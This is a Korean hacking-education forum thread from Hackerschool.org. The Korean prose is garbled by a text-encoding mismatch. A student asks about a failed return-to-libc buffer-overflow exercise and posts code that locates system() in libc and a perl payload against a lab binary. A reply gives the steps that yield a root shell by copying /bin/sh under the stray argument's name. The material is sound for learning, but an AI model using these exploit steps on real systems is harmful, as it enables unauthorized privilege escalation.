½Ã½ºÅÛ ÇØÅ·

 1574, 9/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ygw0225
   BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1725 [º¹»ç]


»ç½Ç Àú¿Í°°ÀÌ Áú¹®ÇÑ ±ÛÀÌ Àֱ淡ºÃ´Âµ¥ ´äº¯ÀÌ ¹«½¼¸»ÀÎÁö ¸ô¶ó¼­
°°Àº Áú¹®µå¸³´Ï´Ù.

ÇÚµåºÏÀÇ °­Á°úÁ¤°ú ´Ù¸£°Ô ³ª¿Í ÇöÀç ¸·Èù»óÅÂÀÔ´Ï´Ù ¤Ð¤Ð
--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <dlfcn.h>

int main()
{
   long addr;
   void *handle;

   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%x\n", addr);

}
(ÄÁÆ®·²+D ÀÔ·Â)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> systemÀÇ ÁÖ¼Ò¸¦ ¾Ë¾Æ³½ µÚ
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?¿C?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

À§¿¡ ¸í·ÉÀ» ÃÆÀ»¶§ °­Á¿¡¼­´Â À§ ó·³ ¶ß´Âµ¥ ¹ÝÇØ Àú´Â ¾Æ·¡¿Í°°Àº ¹®±¸°¡ ¶å´Ï´Ù.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(ÀÌ»óÇÑ ¹®ÀÚ)
sh: syntax error near unexpercted token '(ÀÌ»óÇѹ®ÀÚ)'
sh: -c: line 1: '(ÀÌ»óÇѹ®ÀÚ)'
Segmentation fault

¾î¶»°Ô ÇØ¾ß °­ÁÂó·³ µÉ ±î¿ä?

  Hit : 3343     Date : 2014/01/08 01:34



    
cd80 ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÇϽŴÙÀ½¿¡
xxd ./asdfasdf ¿¡¼­ ¸»¾¸ÇϽŠÀÌ»óÇѹ®ÀÚÀÇ Çí½º¿­À» ãÀ¸½Å´ÙÀ½¿¡
cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"') ÀÌ·±½ÄÀ¸·Î /bin/sh¸¦ ±× ÀÌ»óÇѹ®ÀÚ·Î º¹»çÇϽŴÙÀ½¿¡
export .:$PATH ÇÏ½Ã°í ´Ù½Ã
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
Çغ¸¼¼¿ä
2014/01/08  
ygw0225 ¿Í¿ì °¨»çÇÕ´Ï´Ù! ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ root½©À» ȹµæÇÏ°Ô µÇ¾ú½À´Ï´Ù.
±×·±µ¥ Á¦°¡ ¿Ïº®ÇÏ°Ô ÀÌÇظ¦ ÇÏÁö¸øÇÏ¿´½À´Ï´Ù; Áú¹® ¸î°¡Áöµå¸®°Ú½À´Ï´Ù.

1. À§´ñ±Û·Î ¸»¾¸ÇØÁֽŠÇØ°áÃ¥À» ¶È°°ÀÌ ÇÏ¿´´Âµ¥¿ä ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼­ ´Ù¼¸¹ø°ÁÙ(À§´ñ±Û¿¡¼­)
./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ÀÔ·ÂÇÏ¸é ¹Ù·Î root½©À» ȹµæÇÏ°Ô µÇ´Â°Ç°¡¿ä
¾Æ´Ï¸é syntax error ¸¦ sh: ?¿C?? command not found ·Î °­Á¿¡¼­Ã³·³ ³ª¿À°Ô ÇϱâÀ§ÇÑ °úÁ¤Àΰ¡¿ä?
¸»¾¸ÇϽŴë·Î µû¶óÇÏ°í³ª´Ï sh: ?¿C?? command not found ·Î ³ª¿Í¼­ system()»çÀÌ¿¡ Çí½º¿­À» È®ÀÎÇؼ­
¸µÅ©ÆÄÀÏÀ» ¸¸µé¾î ¿¬°á½ÃÄÑ È®ÀÎÀ»Çß½À´Ï´Ù...°á±¹ °°Àº°ÍÀ» ¹Ýº¹ÇØ¾ß Çϴ°ǰ¡¿ä?

2. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÀÌ·¸°Ô ÇÒ°æ¿ì ÆÄÀÏÀº ¸¸µé¾îÁö´Âµ¥
xxd asdfasdf ÇÏ¸é ¾Æ¹«°Íµµ ¾È¶å´Ï´Ù 2>asdfasdf .. ±×·¯´Ï±î 2¸¦ ¾Õ¿¡ ºÙ¿©¾ß xxd·Î ÇÒ¶§ Á¦´ë·Î º¸ÀÌ´õ±º¿ä ¹«½¼Â÷ÀÌ°¡Àִ°ÅÁÒ?

3. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ¿¡¼­ x84¿Í "\xe...»çÀÌ¿¡ÀÖ´Â . (Á¡) ÀÌ°Ô ¹«½¼ÀǹÌÀÌÁÒ?
2014/01/08  
cd80 1.
ù¹ø° ./vuln ~~~~ Àº sh: ?¿C?? command not found°¡ Æ÷ÇÔµÈ ¿¡·¯¸Þ¼¼Áö¸¦ asdfasdf¿¡ ³Ö´Â ¸í·ÉÀÌ°í
ÀÌ sh: ¿Í command »çÀÌ¿¡ ÀÖ´Â ±úÁø ¹®ÀÚ°¡ ½ÇÁ¦·Î system()ÇÔ¼öÀÇ ÀÎÀÚ·Î µé¾î°¡ ÇÁ·Î±×·¥¸íÀ¸·Î ½ÇÇàÇÏ·Á´Ù ½ÇÆÐÇÑ ¹®ÀÚ¿­ÀÔ´Ï´Ù
µû¶ó¼­ ½ÇÁ¦·Î ÀÌ ¹®ÀÚ¿­·Î ÇÁ·Î±×·¥À» ¸¸µé¾î ½ÇÇàÇÒ¼ö ÀÖµµ·Ï ÇÕ´Ï´Ù

»ç¿ëÇÏ°í °è½Å ¹æ¹ýÀ¸·Î °ø°ÝÇÒ¶© °°Àº °úÁ¤À» ¹Ýº¹ÇØ¾ß ÇÕ´Ï´Ù
Áö±Ý »ç¿ëÇÏ°í °è½Å ±â¹ýÀ» RTLÀ̶ó°í Çϴµ¥
https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt
À̹®¼­³ª ±¸±Û¿¡ "rtl °ø°Ý" À̶ó°í °Ë»öÇÏ½Ã¸é ³ª¿À´Â ¹®¼­³ª ±ÛµéÀ» º¸½Ã¸é¼­ °øºÎÇϽøé ÁÁ½À´Ï´Ù
https://research.hackerschool.org:8080/Html/WG_Documents.html
¿©±â¿¡ ½Ã½ºÅÛÇØÅ· °ü·Ã¹®¼­°¡ ¸¹À¸´Ï Âü°íÇϼ¼¿ä~

2.
¾Æ 2>¸¦ ÇÑ°Ç stderr¸¦ ¸®´ÙÀÌ·º¼ÇÇϱâ À§Çؼ­ ¿´½À´Ï´Ù
¸®´ª½º¿¡¼­ fd ¼¼°³°¡ Á¤ÇØÁø¿ëµµ·Î ¾²À̴µ¥
0Àº stdin, 1Àº stdout, 2´Â stderrÀÔ´Ï´Ù
¿¡·¯¸Þ¼¼Áö¿¡ ÇÁ·Î±×·¥¸íÀÌ ÀÖÀ¸´Ï stderr¸¦ ¸®´ÙÀÌ·º¼Ç ÇؾßÇÕ¤¤µð¤¿

3. Á¡Àº À߸ø½è³×¿ä ¤»¤» Á¡À¸·Îµµ µÇ±ä Çϴµ¥
¹®ÀÚ¿­ µÎ°³¸¦ À̾îÁÖ´Â ¹®¹ýÀÔ´Ï´Ù
½°Ç¥·Îµµ µÇ°í Á¡À¸·Îµµ µË´Ï´Ù
2014/01/11  
ygw0225 cd80´Ô!//Á¤¸»°¨»çÇÕ´Ï´Ù...Â÷±ÙÂ÷±Ù Çϳª¾¿ ¹è¿ì·Á°íÇϴµ¥, ¿ª½Ã ½±Áø¾Ê³×¿ä^^; 2014/01/11  
1414   ½º¸¶Æ®ÆùÇØÅ·[3]     ykoy1577
06/16 3876
1413   ÇϾÆ.... µµÀúÈ÷ ¸ð¸£°Ú½À´Ï´Ù ¹ÌÃĹö¸±²¨°°³×¿ä Á¦¹ß µµ¿ÍÁÖ¼¼¿ä ¤Ð_¤Ð[13]     ykji1003
01/13 4167
1412   ÀüÈ­±â¿¡¼­ ±Ã±ÝÇÑ°Ô À־ ±×·¯´Âµ¥..[4]     YJG
09/19 3813
1411   ÀÌ°Å ¾îµð´Ù ½á¾ß ÇÒÁö ¸ô¶ó¼­ ½Ã½ºÅÛ ÇØÅ·¿¡¼­ ¹°¾îº¾´Ï´Ù.[2]     yj6393
07/31 3618
1410   À©Çí½º°¡ ¹¹¿¡¿ä?[1]     yj6393
07/29 3574
1409   v3´Â ÇÁ·Î±×·¥ÀÇ ¼Ò½ºÄڵ带 º¸°í Ä¡·áÇÏ´Â ÇÁ·Î±×·¥Àΰ¡¿ä?     yj6393
07/08 2938
1408   ¹ÙÀÌ·¯½ºµµ ÇÁ·Î±×·¥Àΰ¡¿ä?[3]     yj6393
07/06 3278
1407   [bof] ¹öÆÛ¿À¹öÇ÷οì Áú¹®ÀÌ¿ä ½ºÆ÷ÁÖÀ§[2]     yj6393
11/05 2928
1406   drive by download °ü·ÃÀÚ·á ã½À´Ï´Ù..[1]     yine01
11/04 3225
1405   µÇµµ¾Ê´Â Å©·¡Å· ¸»°í... ÇØÅ·¸»ÀÔ´Ï´Ù...[6]     yhs4489
08/28 3782
1404   Á¤º¸º¸¾ÈÀü¹®°¡ °¡ µÇ°í ½Í½À¤¤µð¤¿[4]     yh0473
05/30 3482
1403   ½ºÅÿ¡ ASLRÀÌ °É·ÁÀÖÀ¸¸é...???[3]     ygw0225
01/17 3819
  BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®..[4]     ygw0225
01/08 3342
1401   Àú±â¿ä ±ÞÇÕ´Ï´Ù ¤Ì[2]     yenaghhi5
03/13 3800
1400   ½Ã½ºÅÛ ÇØÅ· Linux Ãʺ¸¿¡¼­ dumpÄڵ忡¼­ ¸·Çô¼­ Áú¹®µå¸³´Ï´Ù ¤Ð[1]     yelohair354
03/31 3863
1399   µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð ¹öÆÛ ¿À¹öÇ÷οì...[2]     ydh1220
08/11 3302
1398   ¹öÆÛ¿À¹öÇ÷ο쿡 ´ëÇØ Áú¹®ÀÌ ÀÖ½À´Ï´Ù..     yangil06
05/14 3344
1397   ÈÞ´ëÆù ÇØÅ·[1]     ya2ho
08/17 4842
1396   ¾ÆÁ÷¹æÇâÀ» ¸øÀâ°Ù½À´Ï´Ù µµ¿òÁ» ºÎŹµå·Á¿ä ^^[5]     ya2ho
07/08 3515
1395   SQL ÀÎÁ§¼Ç ÁÁÀº °­ÀÇÁ»...[3]     xodnr631
08/25 3273
[1][2][3][4][5][6][7][8] 9 [10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org